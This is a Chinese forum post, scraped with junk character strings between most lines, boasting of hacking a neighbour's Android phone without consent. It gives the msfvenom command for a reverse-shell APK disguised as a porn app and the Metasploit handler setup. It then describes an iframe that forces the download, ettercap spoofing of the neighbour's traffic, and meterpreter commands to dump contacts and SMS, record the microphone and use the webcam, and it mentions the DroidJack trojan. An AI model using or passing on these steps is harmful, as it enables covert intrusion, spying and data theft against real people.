中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

& p G6 Q( V+ ?( `/ a$ n3 y# L 五、msf+ettercap入侵邻居安卓手机 8 b3 B' @2 X% A8 Y

" e8 }& s3 }- V5 C: t- K% |

8 G. S$ w7 ^3 e- K% u* C 首先启动msf 7 j( l. X% Z3 y. t: h5 S, c4 ^. l

4 _7 d6 F1 U: J6 A Z- [" J2 _

' C, W7 D+ i% d- [3 A' a 先用kali生成一个安卓木马,如下命令: , h. c! @+ O J

, U ^8 P3 R; E

" f8 M6 K7 i% b \* k' }$ E Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 4 X( n) o7 d+ L' {. _

+ M$ P1 j( G4 X4 m9 J( a( m

& _. u0 C) {" P 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 . C, w; @7 o+ M/ V1 C) X

# Q1 [- x! |. _9 n$ B' h3 j9 {

5 ]. K+ L4 B! a 然后进入msf 1 s- K8 E* T0 t. w1 O* M

% S0 o" {4 [: r: s) B

2 |' M/ [: U4 U- S use exploit/multi/handler 3 i r" {5 H9 E$ Y8 Y

9 w0 a$ A* K; p3 b

& I4 s- I: C, a3 o5 d set payload android/meterpreter/reverse_tcp & Y+ P/ s: T: y0 Y4 Y6 J4 X

7 O: v5 ^& q, O' A

5 Y% { b3 a+ U g, }; F set LHOST 192.168.0.109 //ipkailiip 5 t& _8 ~ H% N' H" I

1 e" ^2 `) n! ?3 |

) F$ a5 y0 ^, v: u$ ], N) v set LPORT 44444 //端口一定要与前面生成的木马的端口一致 0 g. W6 b) _! @& X2 z3 K

( @. H6 B) w* q- v

8 }* g* P( ?8 j" ~8 \5 x% N8 N$ D0 p5 ? Exploit / S/ S0 V1 T* A% A% u

}* `. ?1 u% C7 l% j3 M

- e7 D. Z2 i/ t# _ i' \) D6 a8 T   : Y' d& z# G5 G% w& }

' E6 Q) }, y8 ~

* [" \9 L* A. \ G. H) a' j" @- x- ^ 下面我们开启ettercap -G 5 W [& |, d0 b% E4 s( I

! I% Q. K" k2 R4 {5 d+ X

, m. E% o1 q% w& E 我物理IP y5 G0 k' ]# T8 A, P

$ f( D6 [! N% p+ d; |" j( W

/ z2 y u1 [" e) h   0 Y: W4 s! p- F5 N8 K+ ?0 R, `* F

9 P" U0 S5 l- c5 p

* ]: y6 y8 e5 n6 A9 f0 g 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, . W* G$ y, R/ x# @- |9 d; S

. Z2 a3 B- p3 |" u5 V

1 _5 {! V2 |! Z, r" \, N- `2 } 下面我们来设置一下 * S2 v6 ~4 I3 w4 f% ^

$ Q1 B# O3 z) P# l

& Y& [3 j" w5 ^   . A6 n9 a. _; n/ }) t6 i0 f

1 d# m4 e) c+ X7 \. ~8 f% r# ~

`2 N' ?6 H- _( @% r+ b& {& B 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, : z3 @1 ^: h, B" P1 @+ s! c

0 ^* Y0 m2 L! }

* D+ m4 M% P5 C- b( C F. o, v   - S1 h. `2 a. m1 s4 N0 e

/ ~& v+ X- F/ I2 c' `% g

6 j4 Q+ c; E# `# r! h! Y. F9 R   4 r8 @9 j! L' l D0 k9 r6 G! E

3 |2 g& w& O& Q2 Q' `8 T0 g

( @' d5 L4 v! i( D$ z8 z   6 P2 V1 c! ?% l+ n5 i9 C

$ W; F5 S: f) F) f$ U

2 O+ x9 }0 N6 \   # B# f3 T% G9 C) e! @4 `

5 C$ Q" o' r% k4 e* c# {9 P7 ?

0 M8 A/ D0 A/ P5 L9 }: Y* N% d   7 n9 J( |8 E9 Y! Z5 k

8 p% s# Y4 Z! C3 E" b7 x

8 Z0 Y* f) n2 r   $ b3 T# l, M* K

9 J& Y7 N: {" e. K

9 v( c% S/ t# P! u& O" E7 N V1 d   # Y6 Q' r5 v# t# S( T" I- f+ v/ D

' |1 s- I. r/ |! d5 S% h

0 R: j R/ z5 f   ' k* ?4 y i4 U

& o% M- G# a: t3 L, b0 s5 y

5 V5 t4 y- `5 X U' j2 e/ Z$ Z7 u   9 X$ z+ B7 H: u5 M+ e, P _

4 O- }8 O2 Z/ w3 c: V8 t7 X- S

6 L) L. U* u+ p5 S   & ^$ {* y& r6 d/ s* f( t

% S# h9 B: @% M8 G

- f5 o4 ?& X$ V6 f8 ]- B) y) y! d   % _ l0 p+ S% G' I% k4 _2 g" _

3 i& D+ Y% o6 c4 z |' s

- Q- A5 j" b5 ?1 ]/ V! v4 O; a   - E, ]1 J o+ x5 z k/ y. a

6 P9 o! D* Q* y2 d

U! ]. m- f n" [- }* G0 G   ( {; m$ P3 G- F2 T

, C' l9 F5 T; g' G, L }! W; A1 I

4 [% K0 ~( R& S# v; s 下面我们开始攻击 ' U- q# k i: E- p7 i. l

Y, b5 a) {5 a- a5 Y0 \3 y4 e% {

$ a- `% Q# f, f, n; ]   9 Q. ]. p1 H m5 y8 T8 J

- S1 ~! }& a7 t

7 i$ P. a7 Z9 w   - E7 }9 l4 G; ?2 p! z) c

# K! f5 t( M7 ?' Z; x

' L$ p) }. b' L3 u7 ~6 F   7 b; j8 s1 j: T; `2 U1 X

3 L0 _" ^0 e( _! E E2 ]4 s

$ H6 Q3 {7 J" D1 p& { j; E* ]   " E! S. [( x3 ]3 ~5 K+ d

/ x0 ~# [1 E0 y- `

9 t" y- C8 t- i1 ~' D9 `+ w! Q   ' U9 V$ z0 V+ i- ]

) b! V( a; E, ]* T! Z! r

6 K0 c3 {" y. f9 ~$ w( w9 G 大概过了5分钟多,发现反弹成功了 5 F5 _% _8 N* z& l& f- j& f8 e# K

& R! E3 W: S! P& P9 @ s

! S# R3 R4 A. o3 R: b" c   6 x7 d# J2 i- _/ k

9 k' M' `: z( S' G$ m0 q

- v- \0 K% {- P! \% J( ~1 G# B k g   / q! u$ c+ _) D9 H$ `- o

6 m! B* Z2 ]. D) D2 J7 k- w; l

* c$ L6 U0 Z2 M) u1 J: R( X+ b   ' P9 N1 j' z$ l" w8 M

4 ~0 u' r& j2 L: m! {) c

2 D; U1 k, k4 r   7 G+ ^) J ?7 `" m2 i0 `, I- U

; X% |9 k/ x+ ]; _+ P

3 `/ T9 }6 H7 `0 Z- U: [   0 Z6 l. k# C# A* l

; L: \1 h( W" W7 R3 R/ c5 b

$ p) ]1 p% e! m: c   3 t( ~4 K0 u* M5 A J- t5 U7 L

: J. W: b" I+ H% |/ x+ D

: d( b3 M, m" @- c   - v0 M/ P; i, W

; t+ d0 L0 t7 w2 @+ d

- F* `7 a6 a9 _4 ^* X 执行命令 + A' m1 c$ e3 W" | x) U2 O7 U

1 D" s5 F* G T! d! o! X; ^

1 U, e& H3 H, S   + H3 i! c$ |2 B3 u5 [! B) D

$ F+ @/ |3 X E+ L* a, O2 g/ c p: R

; f9 }* B! C0 w/ @ dump_contacts    --》这个是导出电话 ( y' l: b; C2 t6 X9 u

- ]: p! j+ m A3 `5 j- b

$ i' g0 m8 P3 c. |& F dump_sms --》这个是导出信息 2 Z- O6 C" V3 @5 \7 H: ^- F

) Z2 d* @! D8 C4 }4 f b \+ G

7 \, Y- n# V. N, J record_mic     Record audio from the default microphone for X seconds 4 x+ j6 t) y0 q1 c' Q

& X1 v% ]0 B6 q: r

7 h1 _; k' ^3 `9 l7 y" H1 ?/ z     webcam_chat    Start a video chat : j# ~; ~) ^' [& _0 B& Q

: a7 F$ T$ b% q+ D

6 w8 W7 T& @, }9 D: {* m" K* Q     webcam_list    List webcams . Q* Q" q" R- a6 d

1 F% |* o: a& j$ x# U* N

& D6 p1 N2 y0 T: I     webcam_snap    Take a snapshot from the specified webcam 6 T) [" e& N- h9 ^6 X

( c! _3 X! v7 t- d0 l* F5 Y

" A9 k$ y3 t8 R: K3 }& x! o webcam_stream  lay a video stream from the specified webcam * D2 B d7 Y3 ]

; d% [6 Z' ?( f& f9 @! ^

2 B ?% i+ P" @( W; z# K: S   ( p/ M7 e1 P; R% W

& b+ H. Y! j% k( M5 P; {

9 }, ? Z* [! q" i2 p. h   ' X' {* b2 P: F' v2 S- y

& D3 P' Z: w4 E. q

2 K* P! O, D' G4 ?8 q# _) x 我们打开看一下电话薄, 0 M) n1 z8 F0 t+ F

. @! ]. V; {" H7 c6 P

9 |4 d( K5 _$ |8 c0 u6 L   9 E/ G/ D, e' s/ f* p+ D# [

, o7 X0 {' n: F5 _5 t( @& Z& Z3 X

7 F) I: Q, n$ B; G0 M: l! P: i' O! i9 F   , ?6 I% N% ]6 v( J& O- X/ ?

: b) r# J) v. I' ] l

1 p: ], z9 l( {6 ~: V8 J   ' b6 q4 l* B, C/ s

. R# a+ D7 }1 N* ~

" T, C& }8 d/ q- ?2 ~# G6 D   * m0 P. d4 p) F7 u, k/ Y' k

: X- W' P+ c: d# Y& S5 E: Z5 e

! M5 y. [5 o7 o2 ?   % v; g: h( P7 D. ?: R, H' }. E7 Q+ r

" q. M, h3 \6 e- s' p; @; ?' V

) E" m- b$ ]) Z   3 G" J% c; U$ m; T" v: Q& ~

3 q& y7 ]: Z; k! E S( L

" R5 a' \( B9 L2 I# b 我们同时欺骗成DroidJack木马,使用方法如图: : b, ^" t B, {

) S8 y7 h( V9 e1 S; n) y9 Q7 y& L

! L. p" t& I! ]* y   - w7 S9 A* ?. R8 [9 [

7 ], ]' a: V/ C" M

% f% D3 a- r# @ v   ; j+ i. D8 e) D

B M2 s; [ G# J

8 z( J A) [: e7 E% d s: l) c   5 C5 ^+ \& ]- O

& O2 |/ w$ n$ V0 H; z2 T3 _' j

, I) Y4 S1 J9 b! g 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 % { e; [8 K4 _5 q) o

1 v8 B" S' r8 M& G; O1 @9 _+ Q

1 r3 x$ x7 y2 r+ R" P, T j   & m9 p" O& ~" X" e

, {5 q3 o% U; n) A4 m9 K3 G- S

" x% _9 d6 `; M% V9 a( T2 p   9 D U3 _) q. t! Z! w' A4 N

- T( M1 E6 u% A2 d$ O

3 B# P/ O) y. a   6 W0 ]9 I5 s/ m! }

6 e1 w: O, l/ B# U r, O

4 B6 d5 A0 W% c7 c- Y % U7 w3 t# D. W# y, a

- Y1 d, \& n' N- G4 k- z1 V

$ J2 W" i$ P5 d5 ]8 S# ~
% s; O: U: _8 b/ g- D p1 H* u. H





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2